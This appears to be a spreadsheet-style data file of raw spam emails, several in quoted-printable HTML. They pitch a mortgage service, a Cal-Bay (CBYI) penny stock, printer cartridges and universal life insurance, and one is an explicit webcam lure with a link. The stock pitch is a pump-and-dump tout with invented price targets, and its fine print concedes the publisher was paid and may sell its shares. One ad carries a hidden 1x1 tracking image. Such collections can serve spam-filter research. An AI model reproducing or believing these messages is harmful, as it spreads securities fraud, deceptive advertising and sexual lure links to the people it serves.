             &lt;P align=3D"center"&gt;&lt;FONT face=3D"Verdana, Arial, Helvetica, s=
 ans-serif"&gt;&lt;SPAN 
             class=3D865565316-27082002&gt;&lt;FONT color=3D#0000ff face=3DArial 
             size=3D2&gt;&lt;STRONG&gt;&lt;FONT 
             color=3D#000000 size=3D5&gt;USE OUR 100%&amp;nbsp;FREE SERVICE&amp;nbsp;&lt;=
 /FONT&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;STRONG&gt;&amp;nbsp;&amp;nbsp;&lt;/STRONG&gt;&lt;BR&gt;
                   &lt;/FONT&gt;&lt;/P&gt;
             &lt;P&gt;&lt;FONT size=3D4&gt;&lt;FONT color=3D#ff0000&gt;&lt;FONT 
             face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;SPAN 
             class=3D865565316-27082002&gt;&lt;STRONG&gt;&lt;FONT 
             face=3DArial&gt;***&amp;nbsp;No&amp;nbsp;&lt;/FONT&gt;&lt;FONT 
             face=3DArial&gt;FEES&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;=
 /P&gt;
             &lt;P&gt;&lt;FONT size=3D4&gt;&lt;FONT color=3D#ff0000&gt;&lt;FONT 
             face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;SPAN&gt;&lt;FONT 
             face=3DArial&gt;****No OBLIGATIONS&amp;nbsp;&lt;/FONT&gt;&lt;FONT face=3DArial=
 &gt;and 
             No&amp;nbsp;&lt;/FONT&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
             class=3D865565316-27082002&gt;COMMITMENTS&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/F=
 ONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
                 &lt;P align=3D"center"&gt;&lt;FONT color=3D#009933 face=3D"Verdana,=
  Arial, Helvetica, sans-serif" 
             size=3D4&gt;&lt;SPAN class=3D865565316-27082002&gt;&lt;FONT 
             color=3D#0000ff face=3DArial size=3D2&gt;&lt;STRONG&gt;&lt;FONT color=3D#0=
 0CC00 
             size=3D5&gt;Find Out How Much YOU Can $AVE!!!&lt;/FONT&gt;&lt;/STRONG&gt;&lt;fon=
 t color=3D"#00FF00"&gt;&amp;nbsp;&lt;/font&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
             &lt;UL&gt;
               &lt;LI&gt;&lt;SPAN class=3D865565316-27082002&gt;&lt;FONT color=3D#0000ff f=
 ace=3DArial 
               size=3D2&gt;Its&amp;nbsp;Free, Fast and Simple&amp;nbsp;&lt;/FONT&gt;&lt;/SPAN&gt; 
               &lt;LI&gt;&lt;SPAN class=3D865565316-27082002&gt;&lt;FONT color=3D#0000ff f=
 ace=3DArial 
               size=3D2&gt;Rates are at the lowest point in decades!&lt;/FONT&gt;&lt;/S=
 PAN&gt;
               &lt;LI&gt;&lt;SPAN class=3D865565316-27082002&gt;&lt;FONT color=3D#0000ff f=
 ace=3DArial 
               size=3D2&gt;National&amp;nbsp;Lenders Ready to Serve You 
               &lt;/FONT&gt;&lt;/SPAN&gt;&lt;STRONG&gt;!&lt;/STRONG&gt; &lt;/LI&gt;&lt;/UL&gt;
             &lt;P&gt;&lt;/P&gt;
                 &lt;P align=3D"center"&gt;&lt;FONT color=3D#0066ff face=3D"Verdana,=
  Arial, Helvetica, sans-serif" 
             size=3D5&gt;&lt;STRONG&gt;&lt;A href=3D"http://211.163.194.39/consumermedi=
 a/unitedlending/"&gt;Click Here 
                   Now&lt;/A&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
                 &lt;P align=3D"center"&gt;To be removed, REPLY to this email wit=
 h REMOVE 
                   in the SUBJECT.&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;=
 /TBODY&gt;&lt;/TABLE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re:
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;HEAD&gt;
     &lt;TITLE&gt;
     &lt;/TITLE&gt;
 &lt;META http-equiv=3D=22Content-Type=22 content=3D=22text/html; charset=3Dwindo=
 ws-1252=22&gt;
     &lt;STYLE&gt;
 A:link =7B
     TEXT-DECORATION: none
 =7D
 A:active =7B
     TEXT-DECORATION: none
 =7D
 A:visited =7B
     TEXT-DECORATION: none
 =7D
 A:hover =7B
     COLOR: =230033ff; TEXT-DECORATION: underline
 =7D&lt;/STYLE&gt;
 &lt;META content=3D=22MSHTML 6.00.2713.1100=22 name=3D=22GENERATOR=22&gt;
 &lt;/HEAD&gt;
    &lt;BODY text=3D=22=23000000=22 vLink=3D=22=230033ff=22 link=3D=22=230033ff=22 bgCo=
 lor=3D=22=23ffffff=22&gt;
        &lt;TABLE borderColor=3D=22=233366cc=22 cellSpacing=3D=224=22 cellPadding=3D=
 =2215=22 border=3D=224=22&gt;
            &lt;TR&gt;
                &lt;TD bgColor=3D=22=233366cc=22&gt;
                    &lt;DIV align=3D=22center=22&gt;                      
                       &lt;FONT face=3D=22arial, helvetica=22 color=3D=23ffffff&gt;=
                       &lt;FONT size=3D6&gt;                                 Fo=
 r 
                                        Immediate Release&lt;BR&gt;
                    &lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;
                &lt;/TD&gt;
            &lt;/TR&gt;
            &lt;TR&gt;
                &lt;TD&gt;
 &lt;P&gt;                  
                   &lt;FONT face=3D=22arial, helvetica=22 color=3D=23000000 size=
 =3D3&gt;                  
                   &lt;FONT 
       size=3D2&gt;&lt;STRONG&gt;Cal-Bay (Stock Symbol:&amp;nbsp;CBYI) 
       &lt;/STRONG&gt;Watch for analyst =22Strong Buy Recommendations=22 and sev=
 eral advisory newsletters 
       picking CBYI.&amp;nbsp;&amp;nbsp; CBYI has filed to be traded on the&amp;nbsp=
 ;OTCBB, 
       share prices historically INCREASE when companies get listed 
       on this larger trading&amp;nbsp;exhange. CBYI is trading around 25 ce=
 nts 
       and should skyrocket to =242.66 - =243.25 a share in the near futur=
 e. &amp;nbsp; 
       &lt;STRONG&gt;Put CBYI on your watch list, acquire a postion&lt;/STRONG&gt;&lt;/=
 FONT&gt;                  
                   &lt;FONT size=3D2&gt;&lt;STRONG&gt;TODAY.&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/=
 P&gt;                  
                   &lt;FONT 
       face=3D=22arial, helvetica=22 color=3D=23000000 size=3D3&gt;              =
                   &lt;FONT size=3D2&gt;
 &lt;P&gt;                             REASONS TO INVEST IN CBYI
                                  &lt;LI&gt;   A profitable company and is on =
 track to beat ALL 
       earnings estimates                                
                                 &lt;FONT size=3D2&gt;    =21&lt;/FONT&gt;
                                  &lt;LI&gt;One of the FASTEST growing distrib=
 utors in environmental &amp;amp; safety 
       equipment instruments.
                                  &lt;LI&gt;&lt;/FONT&gt;                           =
                                 &lt;FONT size=3D2&gt;Excellent management team=
 , several EXCLUSIVE 
       contracts.&amp;nbsp; IMPRESSIVE client list including the&amp;nbsp;U.S. A=
 ir Force, 
       Anheuser-Busch, Chevron Refining and Mitsubishi Heavy Industries,=
       GE-Energy &amp;amp; Environmental Research.&lt;/FONT&gt;&lt;/FONT&gt;
 &lt;P&gt;                                
                                 &lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;RAPID=
 LY GROWING INDUSTRY&lt;/STRONG&gt;&amp;nbsp;&lt;BR&gt;Industry revenues exceed =24900 mil=
 lion, estimates indicate that there 
       could be as much as =2425 billion from =22smell technology=22 by the=
  end of 
       2003.&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;                                
                                 &lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;=21=21=21=
 =21=21 CONGRATULATIONS 
       =21=21=21=21=21&lt;BR&gt;&lt;/STRONG&gt;Our last recommendation to buy&amp;nbsp;ORBT a=
 t 
       =241.29&amp;nbsp;rallied&amp;nbsp;and is holding steady at&amp;nbsp;=244.51=21&amp;n=
 bsp; 
       Congratulations to all our subscribers that took advantage of thi=
 s 
       recommendation.&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;                                
                                 &lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;     =
                                 &lt;FONT 
       color=3D=230000ff size=3D2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;B=
 R&gt;
 &lt;P align=3D=22center=22&gt;&lt;STRONG&gt;                                
                                 &lt;FONT color=3D=23ff0000&gt;ALL removes HONER=
 ED. Please allow 7 
       days to be removed and send ALL address to:&lt;A href=3D=22mailto:UnSu=
 bscribe=40btamail.net.cn=22&gt;
 NeverAgain=40btamail.net.cn
 &lt;/A&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/A&gt;&lt;/A&gt;&lt;/A&gt;&lt;/P&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/LI&gt;
                &lt;/TD&gt;
            &lt;/TR&gt;
        &lt;/TABLE&gt;
 &lt;P&gt;      
       &lt;FONT size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;      
       &lt;FONT size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;      
       &lt;FONT size=3D1&gt;Certain statements contained in this news release m=
 ay be 
 forward-looking statements within the meaning of The Private Securities=
 Litigation Reform Act of 1995. These statements may be identified by su=
 ch terms 
 as =22expect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or simila=
 r terms. We are NOT 
 a registered investment advisor or a broker dealer. This is NOT an offe=
 r to buy 
 or sell securities. No recommendation that the securities of the compan=
 ies 
 profiled should be purchased, sold or held by individuals or entities t=
 hat learn 
 of the profiled companies. We were paid =2427,000 in cash by a third par=
 ty to 
 publish this report. Investing in companies profiled is high-risk and u=
 se of 
 this information is for reading purposes only. If anyone decides to act=
  as an 
 investor, then it will be that investor's sole risk. Investors are advi=
 sed NOT 
 to invest without the proper advisement from an attorney or a registere=
 d 
 financial broker. Do not rely solely on the information presented, do a=
 dditional 
 independent research to form your own opinion and decision regarding in=
 vesting 
 in the profiled companies. Be advised that the purchase of such high-ri=
 sk 
 securities may result in the loss of your entire investment.&lt;/FONT&gt;    =
       &lt;FONT 
 size=3D1&gt;The owners of this publication may already own free trading sha=
 res in 
 CBYI and may immediately sell all or a portion of these shares into the=
  open 
 market at or about the time this report is published.&amp;nbsp; Factual sta=
 tements 
 are made as of the date stated and are subject to change without notice=
 .&amp;nbsp; 
 Not intended for recipients or residents of CA,CO,CT,DE,ID,      
       &lt;FONT 
 size=3D1&gt;IL,IA,LA,MO,NV,NC,OK,OH,PA,RI,TN,VA,WA,WV,WI. Void where 
 prohibited.&amp;nbsp;&lt;/FONT&gt;      
       &lt;FONT size=3D1&gt;Copyright c 2001&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
    &lt;/BODY&gt;
 &lt;/HTML&gt;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</si>
  <si>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[SA] [Ginger] has sent you a webcam invitation!
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Dr. Schaefer:
 I would greatly appreciate a reprint of your article entitled
 which appeared in 
 Sincerely Yours,
 message: this girls pussy is so wet...she squirts!!http://webcamzz.dr.aggo here to watch her webcam!her name is Ginger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</si>
  <si>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Printer Cartridges - Coupon - Save up to 80%
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Language" content="en-us"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 5.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;title&gt;Mailing&lt;/title&gt;
 &lt;/head&gt;
 &lt;body topmargin="0"&gt;
 &lt;IMG SRC="http://service.bfast.com/bfast/serve?bfmid=37920189&amp;siteid=39194179&amp;bfpage=vm2" BORDER="0" WIDTH="1" HEIGHT="1" NOSAVE &gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="475" height="715"&gt;
     &lt;tr&gt;
       &lt;td width="100%" bgcolor="#00AEEF" height="715"&gt;
       &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13"&gt;
           &lt;img border="0" src="http://www.printpal.net/images/mail_4f.gif" WIDTH="300" HEIGHT="169"&gt;&lt;img border="0" src="http://www.printpal.net/images/mail_4g.gif" WIDTH="175" HEIGHT="169"&gt;&lt;/a&gt;&lt;table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#00AEEF" width="100%" height="1"&gt;
             &lt;tr&gt;
               &lt;td width="100%" height="1"&gt;
               &lt;table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" height="173" bgcolor="#00AEEF"&gt;
                 &lt;tr&gt;
                   &lt;td width="100%" height="135" bgcolor="#00AEEF"&gt;
                   &lt;p align="center"&gt;&lt;br&gt;
                   &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13"&gt;
                   &lt;img border="0" src="http://www.printpal.net/images/mail_4h.gif" width="460" height="80"&gt;&lt;/a&gt;&lt;/p&gt;
                   &lt;table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" height="332"&gt;
                     &lt;tr&gt;
                       &lt;td width="25%" align="center" height="112"&gt;
                       &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13"&gt;
                       &lt;img border="0" src="http://www.printpal.net/images/mail_4c.gif" WIDTH="100" HEIGHT="100"&gt;&lt;/a&gt;&lt;/td&gt;
                       &lt;td width="75%" height="112"&gt;
                       &lt;table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%"&gt;
                         &lt;tr&gt;
                           &lt;td width="8%"&gt;&amp;nbsp;&lt;/td&gt;
                           &lt;td width="92%"&gt;
                       &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13" style="text-decoration: none"&gt;
                       &lt;font color="#000000" size="2" face="Verdana"&gt;We offer the highest quality 
                           inkjet cartridges and Laser Toners at super low 
                           prices. All of our products are 100% guaranteed and 
                           factory tested to meet the quality specifications set 
                           forth by the Original Equipment Manufacturer (OEM). 
                           Our cartridges and refill kits will give you images 
                           equivalent to those produced by OEM cartridges but 
                           they cost much less.&lt;/font&gt;&lt;/td&gt;&lt;/a&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;
                       &lt;td width="25%" align="center" height="184"&gt;
                       &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13" style="text-decoration: none"&gt;
                       &lt;img border="0" src="http://www.printpal.net/images/mail_4d.gif" WIDTH="100" HEIGHT="100"&gt;&lt;/a&gt;&lt;/td&gt;
                       &lt;td width="75%" height="184" valign="top"&gt;
                       &lt;p align="center"&gt;&lt;font style="font-size: 8.5pt"&gt;
                       &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13" style="text-decoration: none"&gt;
                       &lt;img border="0" src="http://www.printpal.net/images/mail_4b.gif" WIDTH="300" HEIGHT="170"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;
                       &lt;td width="25%" align="center" height="112"&gt;
                       &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13" style="text-decoration: none"&gt;
                       &lt;img border="0" src="http://www.printpal.net/images/mail_4e.gif" WIDTH="100" HEIGHT="100"&gt;&lt;/a&gt;&lt;/td&gt;
                       &lt;td width="75%" height="112"&gt;
                       &lt;ul&gt;
                         &lt;li&gt;
                         &lt;font face="Verdana" color="#111111" style="font-size: 8.5pt"&gt;
                         &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13" style="text-decoration: none"&gt;
                         &lt;font color="#000000"&gt;Save up to 80% off retail prices.
                         &lt;/font&gt;&lt;/a&gt; &lt;/font&gt;&lt;/li&gt;
                         &lt;li&gt;
                         &lt;font face="Verdana" color="#111111" style="font-size: 8.5pt"&gt;
                         &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13" style="text-decoration: none"&gt;
                         &lt;font color="#000000"&gt;All our products are 100% satisfaction guaranteed.
                         &lt;/font&gt;&lt;/a&gt;
                         &lt;/font&gt;&lt;/li&gt;
                         &lt;li&gt;
                         &lt;font color="#111111" face="Verdana" style="font-size: 8.5pt"&gt;
                         &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13" style="text-decoration: none"&gt;
                         &lt;font color="#000000"&gt;We offer FREE 
                         SHIPPING on all U.S. 
                         orders over . &lt;/font&gt;&lt;/a&gt; &lt;/font&gt;
                         &lt;/li&gt;
                         &lt;li&gt;
                         &lt;font face="Verdana" color="#111111" style="font-size: 8.5pt"&gt;
                         &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13" style="text-decoration: none"&gt;
                         &lt;font color="#000000"&gt;All orders are sent Priority Mail with online tracking.
                         &lt;/font&gt;&lt;/a&gt;
                         &lt;/font&gt;&lt;/li&gt;
                         &lt;li&gt;
                         &lt;font face="Verdana" color="#111111" style="font-size: 8.5pt"&gt;
                         &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13" style="text-decoration: none"&gt;
                         &lt;font color="#000000"&gt;We fully protect your privacy and security.
                         &lt;/font&gt;&lt;/a&gt; &lt;/font&gt;&lt;/li&gt;
                         &lt;li&gt;
                         &lt;font face="Verdana" color="#111111" style="font-size: 8.5pt"&gt;
                         &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13" style="text-decoration: none"&gt;
                         &lt;font color="#000000"&gt;We're dedicated to your satisfaction.&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/li&gt;
                       &lt;/ul&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;
                       &lt;td width="100%" align="center" height="36" colspan="2"&gt;
                       &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13"&gt;
                       &lt;img border="0" src="http://www.printpal.net/images/mail_4a.gif" width="400" height="65"&gt;&lt;/a&gt;&lt;b&gt;&lt;font face="Verdana" size="4"&gt;&lt;br&gt;
                       &lt;a href="http://track.marketingontarget.net/cgi-bin/ppal?e=3444431.13" style="text-decoration: none"&gt;
                       &lt;font color="#000000"&gt;We Offer a 100% Satisfaction Guarantee!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt; 
 &lt;p&gt;&lt;font face=Arial size=1&gt;You received this email because you signed up at one of Consumer Media's websites or you signed up with a party that has contracted with Consumer Media. To unsubscribe from our email newsletter, please visit &lt;a href=http://opt-out.marketingontarget.net/?e=jm@netnoteinc.com&gt;http://opt-out.marketingontarget.net/?e=jm@netnoteinc.com&lt;/a&gt;. &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Who Do You Trust?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_42AA1_01C233F9.06BE6710
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Who do you trust?
  Jake's Bona-Fide Non-guaranteed UL Universal Life with Iron-Clad
 Guarantees
  Guaranteed Universal Life Portfolio	
  	 Guaranteed Death Benefit to Age 120	 
  	 Single or Survivorship Options Available	 
  	 Guaranteed Return of Premium	 
  	 Death Benefit Available for LTC	 
  	 Single Premium Option for Capital 
  Transfer/Rescue Plans	 
  	 A+ Rated Carrier	 
 Call or e-mail one of our regional officers today!
 Northeast
 800-783-6127
 Mike McIntire &lt;mailto:mick1213@aol.com&gt; 	 Southeast
 800-330-5801
 Jerry Cantrell &lt;mailto:jmcatlanta@aol.com&gt; 	 Midwest
 866-407-4404
 Scott Freeman &lt;mailto:scottfreeman@aol.com&gt; 	 West
 800-352-6388
 Dick Lankow &lt;mailto:rwl530@aol.com&gt; 	 
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State: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------=_NextPart_000_42AA1_01C233F9.06BE6710
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Who Do You Trust?&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
       &lt;img src=3D"http://iiq.us/images/AchGrp/20020614-102.gif" =
 width=3D"550" height=3D"63" alt=3D"Who do you trust?"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/AchGrp/20020614-103.gif" =
 width=3D"293" height=3D"311" alt=3D"Jake's Bona-Fide Non-guaranteed =
 UL"&gt;&lt;img src=3D"http://iiq.us/images/AchGrp/20020614-104.gif" =
 width=3D"257" height=3D"311" alt=3D"Universal Life with Iron-Clad =
 Guarantees"&gt;&lt;br&gt;
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/AchGrp/20020614-2a.gif" width=3D"535" =
 height=3D"82" alt=3D"Guaranteed Universal Life Portfolio"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"16%" align=3D"right" height=3D"25" =
 valign=3D"middle"&gt;&lt;img =
 src=3D"http://iiq.us/images/AchGrp/20020614-3.gif" width=3D"19" =
 height=3D"19"&gt;&lt;/td&gt;
                 &lt;td width=3D"84%"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;nbsp;Guaranteed =
 Death Benefit to Age 120&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"16%" align=3D"right" height=3D"25" =
 valign=3D"middle"&gt;&lt;img =
 src=3D"http://iiq.us/images/AchGrp/20020614-3.gif" width=3D"19" =
 height=3D"19"&gt;&lt;/td&gt;
                 &lt;td width=3D"84%"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;nbsp;Single or =
 Survivorship Options Available&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"16%" align=3D"right" height=3D"25" =
 valign=3D"middle"&gt;&lt;img =
 src=3D"http://iiq.us/images/AchGrp/20020614-3.gif" width=3D"19" =
 height=3D"19"&gt;&lt;/td&gt;
                 &lt;td width=3D"84%"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;nbsp;Guaranteed =
 Return of Premium&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"16%" align=3D"right" height=3D"25" =
 valign=3D"middle"&gt;&lt;img =
 src=3D"http://iiq.us/images/AchGrp/20020614-3.gif" width=3D"19" =
 height=3D"19"&gt;&lt;/td&gt;
                 &lt;td width=3D"84%"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;nbsp;Death =
 Benefit Available for LTC&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"16%" align=3D"right" height=3D"25" =
 valign=3D"top"&gt;&lt;img src=3D"http://iiq.us/images/AchGrp/20020614-3.gif" =
 width=3D"19" height=3D"19"&gt;&lt;/td&gt;
                 &lt;td width=3D"84%"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;nbsp;Single =
 Premium Option for Capital &lt;br&gt;
                   &amp;nbsp;Transfer/Rescue Plans&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"16%" align=3D"right" height=3D"25" =
 valign=3D"middle"&gt;&lt;img =
 src=3D"http://iiq.us/images/AchGrp/20020614-3.gif" width=3D"19" =
 height=3D"19"&gt;&lt;/td&gt;
                 &lt;td width=3D"84%"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;nbsp;A+ Rated =
 Carrier&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;b&gt;&lt;font size=3D"2"&gt;Call or e-mail one of our regional =
 officers today!&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td width=3D"25%" height=3D"60"&gt;&lt;b&gt;&lt;font =
 color=3D"#006600"&gt;Northeast&lt;/font&gt;&lt;br&gt;
                   &lt;font size=3D"4" =
 color=3D"#000066"&gt;800-783-6127&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
                   &lt;font size=3D"2"&gt;&lt;a =
 href=3D"mailto:mick1213@aol.com"&gt;Mike McIntire&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"25%" height=3D"60"&gt;&lt;b&gt;&lt;font =
 color=3D"#006600"&gt;Southeast&lt;/font&gt;&lt;br&gt;
                   &lt;font size=3D"4" =
 color=3D"#000066"&gt;800-330-5801&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
                   &lt;font size=3D"2"&gt;&lt;a =
 href=3D"mailto:jmcatlanta@aol.com"&gt;Jerry Cantrell&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"25%" height=3D"60"&gt;&lt;b&gt;&lt;font =
 color=3D"#006600"&gt;Midwest&lt;/font&gt;&lt;br&gt;
                   &lt;font size=3D"4" =
 color=3D"#000066"&gt;866-407-4404&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
                   &lt;font size=3D"2"&gt;&lt;a =
 href=3D"mailto:scottfreeman@aol.com"&gt;Scott Freeman&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"25%" height=3D"60"&gt;&lt;b&gt;&lt;font =
 color=3D"#006600"&gt;West&lt;/font&gt;&lt;br&gt;
                   &lt;font size=3D"4" =
 color=3D"#000066"&gt;800-352-6388&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
                   &lt;font size=3D"2"&gt;&lt;a =
 href=3D"mailto:rwl530@aol.com"&gt;Dick Lankow&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;&amp;#151; or =
 &amp;#151;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;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value=3D"scottfreeman@aol.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Achievement Grp Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;/td&gt;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&lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_42AA1_01C233F9.06BE6710--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The TBA Doctor Walks the Walk on Diabetes
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_143B1F_01C25A7A.A80CB430
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  The TBA Doctor Walks the Walk... On Diabetes!
  =20
  =20
 Case 1:	 Case 2:	=20
 ? Male age 37
